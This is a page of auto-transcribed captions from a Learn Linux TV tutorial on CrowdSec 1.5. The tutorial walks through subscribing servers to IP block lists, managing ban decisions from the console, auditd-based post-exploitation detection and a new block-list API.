CrowdSec 1.5 Gains New Features - Exploring Block Lists, Post Exploitation Behavior & More!

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
[Music] thank you hello again everyone and welcome back to learn Linux TV in today's video what we're going to do is take a look at crowdsec again because a new version is out with some brand new features and crowdsec is something that I've covered on this channel before and it's a very interesting solution that can block malicious IP addresses from reaching your Linux server and that alone isn't something that sets crowdsec apart from others another solution fail to ban does exactly that and I've covered it on this very Channel but unlike fail to band what sets crowdstick apart from other Solutions is the fact that it uses crowd intelligence to make its decisions and the way that this intelligence factors into crowdsec is such that if a server out there has crowdsec installed and then it becomes the target of a malicious attempt maybe a hacking attempt or something like that then crowdsack analyzes that traffic and makes a decision and if it determines that the activity is in fact malicious it's going to send that information to its Central database and then all the other crowdstack installations out there will benefit from that same information because if you mess with one crowdstick install while you're messing with all of them now of course that was overly simplified I mean I've covered this topic on this channel a few times in the past so if you want to learn even more about crowdsec then check out those videos but what we're going to do in today's video is talk about crowdsec 1.5 which is the latest version and with it comes some very interesting features now I want to be clear before we get started that this is a tutorial video and it is not a review or endorsement I've talked about crowdsec in previous videos on the channel so if you want to find out what my opinion is of this service there's several videos that you can watch to find out exactly that I have a video that shows you how to install it in depth I even have a video that goes over the console feature that's optional but is a good value add to the service so there's no shortage of opinions when it comes to crowdsec on this channel so check out any of those other videos if you want to find out what I think or if you just want to get started if you're already a crowdsec user then well you can check out the new features as I'm going to show you in this video video and you never know maybe some of these features will add a lot of value to you and or your organization so what I want to do right now is dive into crowdsec let's get started and check out what's coming in 1.5 foreign first up what I'm going to do is give you a quick refresher on crowdsack like I mentioned during the intro crowd Tech is a security service that you can install on your Linux server that collects information on malicious activity and it does that to build a threat intelligence database of malicious IP addresses and every server with crowdstack installed will benefit from that intelligence for example if a threat actor attempts to attack a server that has crowdstack installed then that IP address will be blocked right there at the server but it doesn't stop there from there that IP address will be submitted to crowd sex threat intelligence database and all servers that has crowdstack installed will also have information about that IP address and know exactly how to handle it if they happen to see it crowdsec is composed of the security engine as well as one or more remediation components the security engine doesn't do any blocking in and of itself but what it does do is keep track of the traffic that it sees and it's able to recommend that an IP be blocked if it determines that the activity is potentially malicious you could think of the security engine as a silent Observer it keeps a watchful eye on network traffic and what it's able to do is make a decision on how to handle that traffic remediation components on the other hand take action what they do is keep an eye on the crowd sex security engine and if the engine recommends an IP to be blocked then the remediation components that you have installed will take that instruction as a command and execute it in addition there's also a third component of crowdset the crowdset console the console isn't required but it is something that you can opt into if you want a dashboard where you can easily see the status of crowdsec on your servers the engine as well as the remediation components are completely open source and in addition to that there's no account required to use crowdsack that means if you want to install crowdsec on 10 000 servers go right ahead you don't have to call anybody you don't have to sign up for anything just install it now the console does require an account on the other hand but there's a free version for enthusiasts and community members as well as a paid version for Enterprise customers and since it's free well you may as well install it and as we're going to see later on in the video there's good reason to do so because some of the features we're going to talk about require the console but how do you go about getting started with crowdsack well what I'll do is leave a card on the screen right now for a previous video that goes over exactly that if you want to get started with crowdsec then check out that video you can get it installed and then come back here and we'll continue but what I'm going to do right now is show off some of the new features in crowdsec 1.5 so let's take a look and to show you the new features what I'm going to do is take us back to the crowdsec console and that's what you're seeing on this screen right now in fact I've covered the crowdset console in the most recent video I've done about crowdstack up until this one and like I mentioned earlier the crowd set console is something that you can opt into and what it does is it gives you a single pane of glass that you can use to get a look at all of your servers that have crowdstack installed but again this is an optional component you can use crowdsec without it but the value that the console adds is something you should probably take advantage of the primary features are free anyway so why not for those of you that haven't seen the crowd set console before well here you go this optional service gives you a complete overview of all of the nodes that you've installed crowdsec onto however in 1.5 the console adds additional functionality so it's not just about viewing metrics there's more features that you can take advantage of in order to better manage your Fleet of servers and that's what 1.5 helps you accomplish and the first feature that I'd like to show you guys is the fact that now you can subscribe to Blacklist within crowdsac now the thing is you've always had a block list within crowdsec I mean that's at the heart and soul of what crowdsec does it has a database of IP addresses that are known to be malicious and that essentially is a block list and before that was essentially all you had you could add IP addresses yourself manually through the cscli command as I've shown you in previous videos but now you can subscribe to additional block lists Within crowdsec now we can see the option for block list right here it's right here in the menu so when I click on it what it'll do is bring me to a list of block lists that I could add to my server as you can see there's a number of block lists here already and to take advantage of one all you have to do is click on the Subscribe button and the way that this is set up is if you're using the free version of the crowd set console then as part of that account you will have access to two Blacklist subscriptions for free the Enterprise account will give you additional functionality but at the very least you will have access to two blacklists so you may as well subscribe to those as it's provided as part of your account and the way that this is set up is fairly straightforward right here we have a list of block lists that you can subscribe to and every now and then a new block list might be made available so there's a refresh button right here so you could click on that and if any block list was made available that wasn't there before then it's going to be there in the list as soon as you refresh it but scrolling down we can see a number of block lists that are available like I mentioned as part of your free account you can subscribe to any two of these block lists but the only exception being the first three they're tagged with premium as you can see so those are four Enterprise users only but after the first three when you scroll down you'll see that there's a number of block lists that are available to you even without an Enterprise account so you can subscribe to any two of these block lists for more information you can click on any one of these and what that's going to do is take you to a screen that's going to give you more detail about that block list for example we have a description right here but what's also interesting is we have a count of IP addresses so as of the time I'm recording this video this particular block list has 7815 IPS as part of the list but that's not all you could also see the rate of change and that's important when you subscribe to a block list you want to make sure that it's maintained otherwise I mean why bother right so here we can see how active a block list is for example right here we see that this particular list has a 48 change rate when it comes to activity within the last month it also shows us right here how much change this particular list has seen in the last couple of days we also see the last update time this particular list was updated 14 hours ago as of the time I'm recording this video but anyway what I'm going to do is subscribe one of my instances to this list so I'll click right here to add an instance it's going to give me a list of all the servers that have registered with the console so maybe I want to prevent my RSS server from seeing one of those attacks from any of the IPS within that list so what I'll do is click on it right here and then we could choose what kind of block we want this particular server to have so essentially we can outright ban the IP addresses within that list we could show them a captcha so that way they can still access the server but in order to do so they are going to have to solve a captcha and that's not going to necessarily prevent anyone from getting into the server but it is going to make it take a lot longer so that could be an option if that's something that you want to do there's also a custom option here but I'm not going to go over that in this video but what I'm going to do right now is just outright ban everyone that's a part of this list this is not something that I generally allow other people to access this is my RSS server so I'm just going to click ban right there and then I'm going to click save now pay special attention though on the bottom there in bold it says that this will be effective in up to two hours after your next Community blocklist poll so just keep in mind that the changes may not show up immediately but we definitely want to subscribe to some Blacklist us to take advantage of the features so I'll click save and as we can see right here we have this particular server that's being subscribed to that block list it's as simple as that now going back to the main page here we can see that I have one free block list subscription I have one more remaining and if I scroll down I could choose another block list and you know what I'm going to subscribe to this one right here from the description down here it's looking like this is going to help block Port scanners and there's currently over 8 000 IPS within this list so that's something I definitely want to benefit from so I will subscribe to that one as well you can either click anywhere in here to view more information about the block list or go right to the Subscribe button that's right here on the right so I'll click on that and then what I'll do is add the same instance my RSS server I also need to choose the desired result as well so I'll select ban yet again and as you can see the RSS server is now subscribed to that block list how cool is that so as you can see you can now subscribe to block list within crowdsec 1.5 but that's not the only IP related feature we're going to look at in today's video the next thing that I would like to show you guys is real-time decision management and it's another feature of crowdsec 1.5 so let's take a look now what we'll see right here in this menu is a list of decisions hence the name even blocking your IP address if you mess up the password enough times that's a decision and what you could do here is remove a decision in the case that something was blocked that shouldn't have been but another thing you could do here is be proactive if there's an IP address you definitely want to block for whatever reason and you want to do that ahead of time before it becomes a problem you could click add a decision right here you could type in the IP address you could choose what you want done if that particular IP address is found trying to access your servers you can also choose the duration as well four hours eight hours or so on after that time passes then the decision is going to be deleted and then what you could do is choose the target for where you want this rule to apply now as you've just seen there's a decisions tab within the console and that's where you go to take advantage of real-time decision management but one thing that I want to point out right now is that depending on when you are watching this video that tab might not be present within your account and the reason for that is because it's currently considered beta and is expected to roll out soon so if you don't see that yet just hold on a bit you will see that before too long because it's going to roll out very soon so I don't have an IP address that I want to block right now I would add my own IP address here but I don't want to do that because then I'd lock myself out but I think you get the idea if there's an IP address that you want to block within crowdsec you could do that right here from the console instead of only being able to do it from the command line now let's switch gears and talk about another new feature in crowdsec 1.5 post exploitation behaviors if a thread actor ends up getting into your server anyway then post exploitation behavior is something you might benefit from so this is one of those things that you'll hope that you'll never have a use for but if you do you'll be glad it's there after your server has been compromised what you could do is use post exploitation checks to see if there's any residual users or processes running that probably shouldn't be this new feature utilizes something called audit D which is a service you can run on your Linux server that's not specific to crowdsack but it does present a great mechanism through which to view important system events if you haven't heard of audit D before it provides configurable logging for more or less anything and here's an example of what that might look like with the example collection you are seeing we're focusing on exec cve but you can monitor changes to your file system and more the existence of this feature means that crowdsec is not only relevant when it comes to protecting attacks on the network it can also assist with compliance hardening defense in depth as well as lateral movement those are just example scenarios and this is expected to expand further over time so audit D definitely contains a wealth of knowledge and that allows a solution like crowdsack to hook into that and make decisions based on that and that's what this new feature does as for an example of what a post-exploitation behavior might be imagine a background process that's downloading something I mean I've used wget in the past to download many things and I've shown you how to use wget on this very channel it's a great way to download something if you need to but if a background process is using W get or some other command to download a binary from a remote server that's a little suspicious especially if you're not logged into the server at the time and that's one of the things that post exploitation Behavior can detect this might help you find some of the things that are still running in the background even after the threat is neutralized there's also a brand new block list API and the reason why I'm not able to show you this is because I don't have any code that I've written that can take advantage of such a feature but I do want to make you guys aware of this just in case you do write code or use the API in any kind of way my understanding is that with a new block list API there's going to be less overhead and that's very important considering if you subscribe to a lot of block lists with some services that could slow you down but the block list has been redone to make it a point to not slow you down if you go ahead and subscribe to Blacklist and it's supposed to be faster overall now I can't confirm or deny that this is the case because again I don't have a test case for this but the fact that they're mentioning a speed increase well I think that's noteworthy and I wanted to make you aware of that now I want to be clear that these are not the only new features within crowdsec 1.5 if you are already using crowdsec then these are some of the features that you have to look forward to if you are not using crowdsec then of course you could check out my earlier videos you can find out if this is a solution that's right for you based on that information there's all kinds of information on my Channel about crowdsec and it's something that I use personally so I like to always make these videos available to you guys whenever I upgrade to something and that's exactly what I'm doing here because well I'm using crowdsec 1.5 in production right now but if nothing else if you're currently a crowdsec user then you have a lot to look forward to in 1.5 and you just got a taste of it in this video anyway thank you guys so much for checking out this video I really appreciate it definitely click that like button if this video has helped you out and I will see you in the next video foreign [Music] [Music] foreign [Music]
Info
Channel: Learn Linux TV
Views: 11,262
Rating: undefined out of 5
Keywords: Linux, Ubuntu, Debian, CrowdSec, Security, Linux Security, Cloud Computing, Server Hardening, Intrusion Prevention, Crowd Sec, open-source, security solution, crowdsec tutorial, crowdsec 1.5, crowdsec 2023
Id: aV1RDXwswN8
Channel Id: undefined
Length: 17min 36sec (1056 seconds)
Published: Tue Jun 20 2023
Related Videos
The First 12 Essential Tweaks After Installing Debian 12
Learn Linux TV
323K
5 Must Have Tweaks to Secure OpenSSH
Learn Linux TV
26K
you need this FREE CyberSecurity tool
NetworkChuck
1.2M
This web UI for Ansible is so damn useful!
Christian Lempa
454K
Modernize your Linux Storage with btrfs!
Learn Linux TV
142K
18 Commands That Will Change The Way You Use Linux Forever
Akamai Developer
1.2M
ThinLinc Overview and Tutorial - How to Install and Utilize this Linux Remote Desktop Solution
Learn Linux TV
43K
How to protect Linux from Hackers // My server security strategy!
Christian Lempa
213K
Keep Hackers Out with Crowdsec Now!
Jim's Garage
15K
Linux Crash Course - Scheduling Tasks with Cron
Learn Linux TV
98K
Meet netboot.xyz - Network Boot Any Operating System
Techno Tim
722K
Graylog: Your Comprehensive Guide to Getting Started Open Source Log Management
Lawrence Systems
154K
How to Use the rsync Command to Transfer Files (Linux Crash Course Series)
Learn Linux TV
171K
Why don't more people use Debian Linux?
TechHut
105K
Becoming Anonymous: The Complete Guide To Maximum Security Online
Techlore
1M
Linux Crash Course - The grep Command
Learn Linux TV
97K
Quick and Easy Local SSL Certificates for Your Homelab!
Wolfgang's Channel
688K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.